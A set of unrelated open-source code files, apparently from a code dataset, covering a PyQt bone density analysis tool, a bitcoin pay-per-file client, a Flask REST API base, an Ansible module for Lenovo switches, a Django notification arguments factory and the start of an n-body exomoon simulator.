QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.imageWin.setWindowTitle('BMDanalyse')
self.imageWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.imageWin.setMinimumSize(250,500)
self.imageWin.resize(self.imageWin.minimumSize())
# Create viewBox
self.imageWin.glw = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
self.imageWin.vb = ImageAnalysisViewBox(lockAspect=True,enableMenu=True)
self.imageWin.vb.disableAutoRange()
self.imageWin.glw.addItem(self.imageWin.vb)
arr = self.imageFiles.values()[0]
self.imageWin.vb.img1 = ImageItem(arr,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img1)
self.imageWin.vb.img2 = ImageItem(None,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img2)
self.imageWin.vb.autoRange()
lut = [ [ int(255*val) for val in matplotlib.cm.gray(i)[:3] ] for i in xrange(256) ]
lut = np.array(lut,dtype=np.ubyte)
self.imageWin.vb.img1.setLookupTable(lut)
# Label to show index of current image label
self.imageCurrCont = QtGui.QFrame()
self.imageCurrCont.setLineWidth(2)
self.imageCurrCont.setFrameStyle(QtGui.QFrame.Panel | QtGui.QFrame.Raised)
self.imageCurrCont.setMinimumWidth(70)
self.imageWin.currLabel = QtGui.QLabel("")
self.imageWin.currLabel.setAlignment(QtCore.Qt.AlignHCenter)
imageCurrContLayout = QtGui.QHBoxLayout()
imageCurrContLayout.addWidget(self.imageWin.currLabel)
self.imageCurrCont.setLayout(imageCurrContLayout)
# Create buttons to select images
self.imageWin.buttCont = QtGui.QWidget()
self.imageWin.buttPrev = QtGui.QPushButton(self.icons['imagePrevIcon'],"")
self.imageWin.buttNext = QtGui.QPushButton(self.icons['imageNextIcon'],"")
self.buttLayout = QtGui.QHBoxLayout()
self.buttLayout.addStretch(1)
self.buttLayout.addWidget(self.imageWin.buttPrev)
self.buttLayout.addWidget(self.imageCurrCont)
self.buttLayout.addWidget(self.imageWin.buttNext)
self.buttLayout.addStretch(1)
self.imageWin.buttCont.setLayout(self.buttLayout)
self.imageWin.buttPrev.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttNext.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttPrev.setIconSize(self.iconSize)
self.imageWin.buttNext.setIconSize(self.iconSize)
self.buttLayout.setContentsMargins(0,5,0,5)
self.imageWin.buttPrev.clicked.connect(self.prevImage)
self.imageWin.buttNext.clicked.connect(self.nextImage)
# Create slider
self.imageWin.sliderCon = QtGui.QWidget()
self.imageWin.slider = QtGui.QSlider(self)
self.imageWin.slider.setOrientation(QtCore.Qt.Horizontal)
self.imageWin.slider.setMinimum(1)
self.imageWin.slider.setMaximum(100)
self.imageWin.slider.setMinimumWidth(100)
self.imageWin.slider.valueChanged.connect(self.sliderValueChanged)
self.imageWin.sliderLabel = QtGui.QLabel('1')
self.imageWin.sliderLabel.setMinimumWidth(120)
self.sliderLayout = QtGui.QHBoxLayout()
self.sliderLayout.addStretch(1)
self.sliderLayout.addWidget(self.imageWin.sliderLabel)
self.sliderLayout.addWidget(self.imageWin.slider)
self.sliderLayout.addStretch(1)
self.imageWin.sliderCon.setLayout(self.sliderLayout)
self.sliderLayout.setContentsMargins(0,0,0,5)
# Format image window
self.imageWinLayout = QtGui.QVBoxLayout()
self.imageWinLayout.addWidget(self.imageWin.glw)
self.imageWinLayout.addWidget(self.imageWin.buttCont)
self.imageWinLayout.addWidget(self.imageWin.sliderCon)
self.imageWin.setLayout(self.imageWinLayout)
self.imageWin.imagesRGB = None
# Show
self.imageWin.show()
self.imageWin.slider.setValue(10)
self.sliderValueChanged(10)
self.imageWinIndex = 0
def prevImage(self):
minIndex = 0
currIndex = self.imageWinIndex
prevIndex = currIndex - 1
self.imageWinIndex = max(prevIndex,minIndex)
self.updateImageWin()
def nextImage(self):
numImages = len(self.imageFiles)
maxIndex = numImages - 1
currIndex = self.imageWinIndex
nextIndex = currIndex + 1
self.imageWinIndex = min(nextIndex,maxIndex)
self.updateImageWin()
def updateImageWin(self):
imageFilenames = self.sidePanel.getListOfImages()
imageName = imageFilenames[self.imageWinIndex]
self.imageWin.vb.img1.setImage(self.imageFiles[str(imageName.text())],autoLevels=False)
self.imageWin.vb.img2.setImage(self.imageWin.imagesRGB[self.imageWinIndex],autoLevels=False)
self.imageWin.currLabel.setText("%i / %i" % (self.imageWinIndex+1,len(imageFilenames)))
def showImageWin(self):
self.createImageWin()
self.imagesBMDpercentChange()
self.updateImageWin()
def imagesBMDpercentChange(self):
# Get image arrays and convert to an array of floats
imageFilenames = self.sidePanel.getListOfImages()
images = [ self.imageFiles[str(name.text())] for name in imageFilenames ]
imagesConv = []
for img in images:
image = img.copy()
image[np.where(image==0)] = 1
image = image.astype(np.float)
imagesConv.append(image)
# Calculate percentage change and set with limits -100% to +100%
imagesPercCh = []
imageInitial = imagesConv[0]
for image in imagesConv:
imagePercCh = (image-imageInitial)/imageInitial*100.
imagePercCh[np.where(imagePercCh> 100.)] = 100.
imagePercCh[np.where(imagePercCh<-100.)] = -100.
imagesPercCh.append(imagePercCh)
numImages = len(imagesPercCh)
self.imageWin.imagesRGB = []
for i in xrange(numImages):
image = imagesPercCh[i]
sx,sy = image.shape
imageRGB = image*(255/200.)+(255/2.)
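            # Linear map from percentage change in [-100, 100] to [0, 255]:
            # -100% -> 0, 0% -> 127.5, +100% -> 255, matching the 127-centred
            # thresholding in setLookupTable().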
self.imageWin.imagesRGB.append(imageRGB)
def BMDtoCSVfile(self):
""" Write BMD change to csv file """
fileName = QtGui.QFileDialog.getSaveFileName(None,self.tr("Export to CSV"),QtCore.QDir.currentPath(),self.tr("CSV (*.csv)"))
# Fix for PyQt/PySide compatibility. PyQt returns a QString, whereas PySide returns a tuple (first entry is filename as string)
if isinstance(fileName,types.TupleType): fileName = fileName[0]
if hasattr(QtCore,'QString') and isinstance(fileName, QtCore.QString): fileName = str(fileName)
if not fileName=='':
textFile = open(fileName,'w')
numFrames, numROIs = self.BMDchange.shape
roiNames = self.roiNames
header = "%10s," % 'Time'
header += ((numROIs-1)*'%10s,'+'%10s\n') % tuple(roiNames)
textFile.write(header)
for i in xrange(numFrames):
textFile.write('%10.1f,' % self.timeData[i])
for j in xrange(numROIs):
if j<numROIs-1: fmt = '%10.3f,'
else: fmt = '%10.3f\n'
textFile.write(fmt % self.BMDchange[i,j])
textFile.close()
def showResults(self,):
""" Plots BMD change using matplotlib """
# Create plot window
if self.plotWin==None:
self.plotWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.plotWin.setWindowTitle('BMDanalyse')
self.plotWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.setMinimumSize(600,500)
self.plotWin.resize(self.minimumSize())
# Create Matplotlib widget
self.mplw = MatplotlibWidget(size=(5,6))
self.fig = self.mplw.getFigure()
self.editDataButton = QtGui.QPushButton('Edit plot')
self.exportCSVButton = QtGui.QPushButton('Export data')
self.mplw.toolbar.addWidget(self.editDataButton)
self.mplw.toolbar.addWidget(self.exportCSVButton)
self.editDataButton.clicked.connect(self.showEditBox)
self.exportCSVButton.clicked.connect(self.BMDtoCSVfile)
# Format plot window
self.plotWinLayout = QtGui.QVBoxLayout()
self.plotWinLayout.addWidget(self.mplw)
self.plotWin.setLayout(self.plotWinLayout)
self.createFigure()
self.plotWin.show()
self.mplw.draw()
def createFigure(self):
""" Creates plot of results """
self.ax1 = self.fig.add_subplot(111)
self.ax1.clear()
self.fig.subplots_adjust(bottom=0.15,top=0.85,left=0.15,right=0.925)
numFrames, numROIs = self.BMDchange.shape
t = self.timeData
# Plot data
for i in xrange(numROIs):
roiname = self.roiNames[i]
self.ax1.plot(t,self.BMDchange[:,i],'-o',label=roiname,linewidth=2.0)
kwargs = dict(y=1.05) # Or kwargs = {'y':1.05}
self.ax1.set_title('Change in Bone Mineral Density over time',fontsize=14,fontweight='roman',**kwargs)
self.ax1.set_xlabel('Time',fontsize=10)
self.ax1.set_ylabel('Change in BMD (%)',fontsize=10)
self.ax1.legend(loc=0)
matplotlib.pyplot.setp(self.ax1.get_xmajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_ymajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_legend().get_texts(),fontsize=10)
self.ax1.grid()
def fillEditBox(self):
rows,cols = self.BMDchange.shape
for i in xrange(rows):
itmValue = '%.2f' % self.timeData[i]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,0,itm)
for j in xrange(cols):
itmValue = '%.2f' % self.BMDchange[i,j]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,j+1,itm)
def showEditBox(self):
self.plotWin.editBox = QtGui.QDialog(self.plotWin, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
self.plotWin.editBox.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.editBox.setWindowTitle('BMDanalyse')
self.plotWin.editBox.setModal(True)
# Add table
layout = QtGui.QVBoxLayout()
layout.setContentsMargins(10,10,10,10)
layout.setSpacing(20)
rows,cols = self.BMDchange.shape
self.tableResults = TableWidget(rows,cols+1,self.plotWin.editBox)
self.tableResults.verticalHeader().setVisible(True)
# Set headers
self.tableResults.setHorizontalHeaderItem(0,QtGui.QTableWidgetItem('Time'))
for i in xrange(cols):
header = QtGui.QTableWidgetItem(self.roiNames[i])
self.tableResults.setHorizontalHeaderItem(i+1,header)
# Add values to table
self.fillEditBox()
# Set layout
layout.addWidget(self.tableResults)
self.buttonsFrame = QtGui.QFrame()
self.buttonsLayout = QtGui.QHBoxLayout()
self.buttonReset = QtGui.QPushButton('Reset')
self.buttonSave = QtGui.QPushButton('Save')
self.buttonClose = QtGui.QPushButton('Cancel')
self.buttonReset.setFixedWidth(50)
self.buttonSave.setFixedWidth(50)
self.buttonClose.setFixedWidth(50)
self.buttonClose.clicked.connect(self.plotWin.editBox.close)
self.buttonSave.clicked.connect(self.updateTableValues)
self.buttonReset.clicked.connect(self.fillEditBox)
self.buttonsLayout.addStretch(1)
self.buttonsLayout.addWidget(self.buttonReset)
self.buttonsLayout.addWidget(self.buttonSave)
self.buttonsLayout.addWidget(self.buttonClose)
self.buttonsLayout.setContentsMargins(0,0,0,0)
self.buttonsFrame.setLayout(self.buttonsLayout)
layout.addWidget(self.buttonsFrame)
self.plotWin.editBox.setLayout(layout)
self.plotWin.editBox.setMaximumSize(layout.sizeHint())
self.plotWin.editBox.show()
def updateTableValues(self):
# Create temporary arrays
timeData = self.timeData.copy()
BMDchange = self.BMDchange.copy()
# Put the values from the tables into the temporary arrays
rows = self.tableResults.rowCount()
cols = self.tableResults.columnCount()
for r in xrange(rows):
for c in xrange(cols):
item = self.tableResults.item(r,c)
itemValue = float(item.text())
if c==0:
timeData[r] = itemValue
else:
BMDchange[r,c-1] = itemValue
# Check that time values are in increasing order. If so, then update arrays
if any(np.diff(timeData)<=0):
self.errorMessage = QtGui.QMessageBox()
self.errorMessage.setWindowIcon(self.icons['BMDanalyseIcon'])
self.errorMessage.setWindowTitle('BMDanalyse')
self.errorMessage.setText('Input error: Time values should be in order of increasing value')
self.errorMessage.setIcon(QtGui.QMessageBox.Warning)
self.errorMessage.open()
else:
self.timeData = timeData
self.BMDchange = BMDchange
self.createFigure()
self.mplw.draw()
self.plotWin.editBox.close() | mit | 8,683,989,055,049,540,000 | 48.940397 | 143 | 0.621192 | false |
fredzannarbor/pagekicker-community | scripts_python_3/bitcoin/fileclient/fileclient.py | 1 | 2020 | #!/usr/bin/env python3
import json
from two1.wallet import Wallet
from two1.bitrequests import BitTransferRequests
# set up bitrequest client for BitTransfer requests
wallet = Wallet()
requests = BitTransferRequests(wallet)
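# BitTransferRequests wraps the requests API so that an HTTP 402 (Payment
# Required) response is settled from the local 21 wallet/buffer before the
# request is retried; that is why the paid endpoint below can be fetched with a
# plain GET. (Summary of the two1 library's documented behaviour, noted here
# for context.)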
# server address
server_url = 'http://localhost:5000/'
def buy_file():
# get the file listing from the server
response = requests.get(url=server_url+'files')
file_list = json.loads(response.text)
# print the file list to the console
for file in range(len(file_list)):
print(("{}. {}\t{}".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))
try:
# prompt the user to input the index number of the file to be purchased
        # read the selection as a string so it matches the JSON keys of file_list
        sel = input("Please enter the index of the file that you would like to purchase:")
# check if the input index is valid key in file_list dict
if sel in file_list:
print(('You selected {} in our database'.format(file_list[sel][0])))
# create a 402 request with the server payout address
sel_url = server_url+'buy?selection={0}&payout_address={1}'
answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)
if answer.status_code != 200:
print("Could not make an offchain payment. Please check that you have sufficient buffer.")
else:
# open a file with the same name as the file being purchased and stream the data into it.
filename = file_list[str(sel)][0]
with open(filename, 'wb') as fd:
for chunk in answer.iter_content(4096):
fd.write(chunk)
fd.close()
print('Congratulations, you just purchased a file for bitcoin!')
else:
print("That is an invalid selection.")
except ValueError:
print("That is an invalid input. Only numerical inputs are accepted.")
if __name__ == '__main__':
buy_file()
| apache-2.0 | -9,155,594,795,914,871,000 | 35.727273 | 106 | 0.619307 | false |
jfillmore/hoops | hoops/base.py | 1 | 9650 | import copy
import json
import re
import logging
from flask import g, request
from flask.ext.restful import abort
from formencode import Invalid, Schema
from formencode.validators import Validator
from hoops.restful import Resource
from hoops.exc import APIValidationException
from hoops.status import library as status_library
request_logger = logging.getLogger('api.request')
class APIOperation(object):
'''
Used to map API parameter names to database fields. e.g.
field_map = {
        (param_name, field_name): lambda val: val,
...
}
'''
field_map = {}
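    # Illustrative (hypothetical) mapping, not part of the original module:
    # expose "customer_id" in the API while the column is called "id", coercing
    # the value to int on the way through:
    #   field_map = {('customer_id', 'id'): int}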
def __call__(self, *args, **kwargs):
# logging parameters
self.url_params = self.validate_url(**kwargs)
self.params = self.validate_input()
remote_addr = request.remote_addr or 'localhost'
request_method = request.environ.get('REQUEST_METHOD')
path_info = request.environ.get('PATH_INFO')
request_logger.debug(
'Request: %s %s %s %s',
remote_addr, request_method, path_info, unicode(self.params)
)
if hasattr(self, 'setup'):
self.setup(*args, **kwargs)
return self.process_request(*args, **kwargs)
def __init__(self, resource=None, method='get'):
self.resource = resource
@property
def combined_params(self):
params = copy.deepcopy(getattr(self, 'params', {}))
url_params = getattr(self, 'url_params', {})
params.update(url_params)
return params
def _map_fields(self, params):
for (param_name, field_name) in self.field_map:
# ignore params in our map not supplied in the API call
if param_name not in params:
continue
            # look up the conversion function for this mapping and transform the value
            func = self.field_map[(param_name, field_name)]
# add the new value back in, removing the old
params[field_name] = func(params[param_name])
del params[param_name]
return params
def _combine_schema(self, attr_name='schema'):
resource_schema = getattr(self.resource, attr_name, None)
operation_schema = getattr(self, attr_name, None)
# Merge combined schemas, preferring the operation_schema settings and fields
if resource_schema and operation_schema:
schema = copy.deepcopy(operation_schema)
for field in resource_schema.fields:
if not field in schema.fields:
schema.add_field(field, resource_schema.fields[field])
else:
schema = resource_schema or operation_schema
return schema or Schema()
def validate_url(self, *args, **kwargs):
schema = self._combine_schema('url_schema')
if not schema: # pragma: no cover
return {}
try:
return schema.to_python(kwargs)
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
def validate_input(self):
schema = self._combine_schema('schema')
try:
params = schema.to_python(self.resource.get_parameters())
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
return self._map_fields(params)
def process_request(self, *args, **kwargs):
pass
class APIModelOperation(APIOperation):
@property
def model(self):
return self.resource.model
def get_base_query(self, **kwargs):
'''Obtains the base query for a model-based operation.'''
all_params = kwargs
all_params.update(self.combined_params)
return self.resource.get_base_query(**all_params)
def fetch(self, **kwargs):
item_id = self.combined_params.get(self.resource.object_id_param, None)
id_column = getattr(self, 'id_column', 'id')
column = getattr(self.model, id_column)
item = self.get_base_query(**kwargs).filter(column == item_id).first()
if item is None:
raise status_library.exception(
'API_DATABASE_RESOURCE_NOT_FOUND',
resource=self.resource.model.__tablename__
)
return item
class UnimplementedOperation(APIOperation):
def __call__(self, *args, **kwargs):
raise status_library.API_CODE_NOT_IMPLEMENTED
class APIResource(Resource):
route = None
model = None
read_only = True
object_id_param = None
endpoint = None
create = UnimplementedOperation()
retrieve = UnimplementedOperation()
update = UnimplementedOperation()
remove = UnimplementedOperation()
list = UnimplementedOperation()
#def __repr__(self):
# methods = ['create', 'retrieve', 'update', 'remove', 'list']
# noop = UnimplementedOperation()
# return "<%s [%s: %s]>" % (
# self.__cls__.__name__,
# self.route,
# ', '.join([
# method for method in methods
# if getattr(self, method) is not noop
# ])
# )
@classmethod
def get_parameters(cls):
def purge_oauth_keys(params):
return {k: params[k] for k in filter(lambda item: not re.match(r'^oauth_', item), params)}
from flask import request
if request.method == 'GET':
return purge_oauth_keys(request.args)
elif request.json:
return purge_oauth_keys(request.json)
elif request.form:
return purge_oauth_keys(request.form)
else:
# TODO: is this case even needed?
return purge_oauth_keys(
json.JSONDecoder().decode(request.stream.read())
)
@classmethod
def method(self, method, endpoint=None):
'''
Decorator to bind a callable as the handler for a method.
It sets the resource property on the callable to be the parent resource.
'''
def wrapper(cls, *args, **kwargs):
cls.resource = self
setattr(self, method, cls(resource=self))
return cls
return wrapper
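    # Hypothetical usage sketch (class and operation names are illustrative only):
    #   @WidgetResource.method('retrieve')
    #   class RetrieveWidget(APIModelOperation):
    #       def process_request(self, **kwargs):
    #           return self.fetch()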
def get(self, **kwargs):
if self.object_id_param in kwargs:
return self.retrieve(**kwargs)
return self.list(**kwargs)
def post(self, **kwargs):
if self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't POST with arguments in URL
if self.read_only:
abort(405)
return self.create(**kwargs)
def put(self, **kwargs):
        if self.object_id_param not in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't PUT without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.update(**kwargs)
def delete(self, **kwargs):
        if self.object_id_param not in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't DELETE without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.remove(**kwargs)
@classmethod
def get_base_query(self, **kwargs):
model = self.model
query = model.query
return query
class base_parameter(object):
schema_property = 'schema'
def __init__(self, field, validator, description):
self.field = field
if isinstance(validator, Validator):
self.validator = validator
else:
self.validator = validator()
self.validator.__doc__ = description
def __call__(self, klass):
if not hasattr(klass, self.schema_property):
schema = Schema()
else:
schema = copy.deepcopy(getattr(klass, self.schema_property))
schema.add_field(self.field, self.validator)
setattr(klass, self.schema_property, schema)
return klass
class parameter(base_parameter):
'''Binds a formencode validator to the schema in either a APIResource or APIOperation.
If the Schema is not yet present, one is created.
The ``required`` and ``default`` named parameters can be used as shortcuts to modify the
``validator`` as if_missing=default and not_empty=required.
Example:
@parameter("id", validator=formencode.validators.Int(), description="Unique ID of object", required=True, default=None)
'''
def __init__(self, field, validator, description, required=None, default=None):
super(parameter, self).__init__(field, validator, description)
if required is not None:
self.validator.not_empty = required
if default is not None:
self.validator.if_missing = default
class url_parameter(base_parameter):
'''Binds a formencode validator to the url_schema in either a APIResource or APIOperation.
If the URL Schema is not yet present, one is created.
All validators added to the schema this way have not_empty=True (as they are mandatory).
Example:
@url_parameter("id", validator=formencode.validators.Int(), description="Unique ID of object")
'''
schema_property = 'url_schema'
| mit | 7,188,259,168,814,752,000 | 33.09894 | 123 | 0.607254 | false |
tsdmgz/ansible | lib/ansible/modules/network/cnos/cnos_conditional_command.py | 1 | 7325 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send Conditional CLI commands to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_conditional_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command based on condition on devices running Lenovo CNOS
description:
- This module allows you to modify the running configuration of a switch. It provides a way to
execute a single CNOS command on a network device by evaluating the current running configuration
      and executing the command only if the specific settings have not already been configured.
The CNOS command is passed as an argument of the method.
This module functions the same as the cnos_command module.
The only exception is that the following inventory variable can be specified
["condition = <flag string>"]
When this inventory variable is specified as the variable of a task, the command is executed for
the network element that matches the flag string. Usually, commands are executed across a group
of network devices. When there is a requirement to skip the execution of the command on one or
more devices, it is recommended to use this module.
This module uses SSH to manage network device configuration.
      For more information about this module from Lenovo and customizing its usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_conditional_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is passed using
double quotes. The variables can be placed directly on to the CLI commands or can be invoked
from the vars directory.
required: true
default: Null
condition:
description:
- If you specify condition=false in the inventory file against any device, the command execution
is skipped for that device.
required: true
default: Null
flag:
description:
- If a task needs to be executed, you have to set the flag the same as it is specified in the
inventory for that device.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_conditional_command. These are written in the main.yml file of the tasks directory.
---
- name: Applying CLI template on VLAG Tier1 Leaf Switch1
cnos_conditional_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_conditional_command_{{ inventory_hostname }}_output.txt"
condition: "{{ hostvars[inventory_hostname]['condition']}}"
flag: leaf_switch2
command: "spanning-tree mode enable"
enablePassword: "anil"
'''
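# A hypothetical inventory entry driving the task above (variable names taken from the
# hostvars referenced in EXAMPLES; the host name and values are placeholders only):
#   leaf2 ansible_host=10.240.0.12 username=admin password=secret
#         deviceType=g8272_cnos condition=leaf_switch2 enablePassword=anil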
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Command Applied"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
condition=dict(required=True),
flag=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True), ), supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
condition = module.params['condition']
flag = module.params['flag']
cliCommand = module.params['clicommand']
outputfile = module.params['outputfile']
deviceType = module.params['deviceType']
hostIP = module.params['host']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
if (condition != flag):
module.exit_json(changed=True, msg="Command Skipped for this value")
return " "
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
    # Enable and enter configure terminal, then send the command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
    # Check the device output for errors before reporting success
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI Command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,509,905,239,353,352,700 | 36.953368 | 150 | 0.694608 | false |
globocom/database-as-a-service | dbaas/notification/management/arguments/factory.py | 1 | 4756 | class ArgumentsTo(object):
KEY = ''
def __init__(self, args):
self.args = args
def build(self):
raise NotImplementedError
@property
def database_name(self):
return self.args['database'].name
def get_database_arg(self):
return "Database: {}".format(self.database_name)
def get_environment_arg(self):
return "Environment: {}".format(self.args['environment'])
def get_plan_arg(self):
return "Plan: {}".format(self.args['plan'])
def get_project_arg(self):
return "Project: {}".format(self.args['project'])
def get_user_arg(self):
return "User: {}".format(self.args['user'])
def get_clone_arg(self):
return "Clone: {}".format(self.args['clone_name'])
class ArgumentsToCreateDatabase(ArgumentsTo):
KEY = 'notification.tasks.create_database'
def build(self):
return [
self.get_database_arg(),
self.get_environment_arg(),
self.get_project_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['name']
class ArgumentsToResizeDatabase(ArgumentsTo):
KEY = 'notification.tasks.resize_database'
def build(self):
return [
self.get_database_arg(),
"New VM Offering: {}".format(self.args['offering']),
]
class ArgumentsToUpgradeDatabase(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database'
def build(self):
return [
self.get_database_arg(),
"Target plan: {}".format(
self.args['database'].databaseinfra.plan.engine_equivalent_plan
),
]
class ArgumentsToUpgradeDatabasePatch(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database_patch'
def build(self):
return [
self.get_database_arg(),
"New patch: {}".format(self.args['patch']),
]
class ArgumentsToReinstallVM(ArgumentsTo):
KEY = 'notification.tasks.reinstall_vm'
def build(self):
return [
self.get_database_arg(),
"Instance: {}".format(
self.args['instance']
),
]
class ArgumentsToDiskResize(ArgumentsTo):
KEY = 'notification.tasks.database_disk_resize'
def build(self):
return [
self.get_database_arg(),
"New Disk Offering: {}".format(self.args['disk_offering']),
]
class ArgumentsToRestoreSnapshot(ArgumentsTo):
KEY = 'backup.tasks.restore_snapshot'
def build(self):
return [
self.get_database_arg(),
"Description: Restoring to an older version. It will finish soon.",
]
class ArgumentsToDestroyDatabase(ArgumentsTo):
KEY = 'notification.tasks.destroy_database'
def build(self):
return [
self.get_database_arg(),
self.get_user_arg(),
]
class ArgumentsToCloneDatabase(ArgumentsTo):
KEY = 'notification.tasks.clone_database'
def build(self):
return [
self.get_database_arg(),
self.get_clone_arg(),
self.get_environment_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['origin_database'].name
class ArgumentsToAnalyzeDatabases(ArgumentsTo):
KEY = 'dbaas_services.analyzing.tasks.analyze.analyze_databases'
def build(self):
return [
"Description: Analyzing all databases",
]
class ArgumentsToUpgradeMongo24To30(ArgumentsTo):
KEY = 'notification.tasks.upgrade_mongodb_24_to_30'
def build(self):
return [
self.get_database_arg(),
]
class ArgumentsToUnbindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.unbind_address_on_database'
def build(self):
return [
"Removing Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToBindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.bind_address_on_database'
def build(self):
return [
"Creating Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToRemoveReadOnlyInstance(ArgumentsTo):
KEY = 'notification.tasks.remove_readonly_instance'
def build(self):
return [
"Removing read only instance from {}".format(self.get_database_arg()),
"Instance: {}".format(self.args['instance'])
]
| bsd-3-clause | 1,724,527,907,496,791,300 | 24.031579 | 82 | 0.597351 | false |
hippke/TTV-TDV-exomoons | create_figures/system_20.py | 1 | 7712 | """n-body simulator to derive TDV+TTV diagrams of planet-moon configurations.
Credit for part of the source is given to
https://github.com/akuchling/50-examples/blob/master/gravity.rst
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License
"""
import numpy
import math
import matplotlib.pylab as plt
from modified_turtle import Turtle
from phys_const import *
class Body(Turtle):
"""Subclass of Turtle representing a gravitationally-acting body"""
name = 'Body'
vx = vy = 0.0 # velocities in m/s
px = py = 0.0 # positions in m
def attraction(self, other):
"""(Body): (fx, fy) Returns the force exerted upon this body by the other body"""
# Distance of the other body
sx, sy = self.px, self.py
ox, oy = other.px, other.py
dx = (ox-sx)
dy = (oy-sy)
d = math.sqrt(dx**2 + dy**2)
# Force f and direction to the body
f = G * self.mass * other.mass / (d**2)
theta = math.atan2(dy, dx)
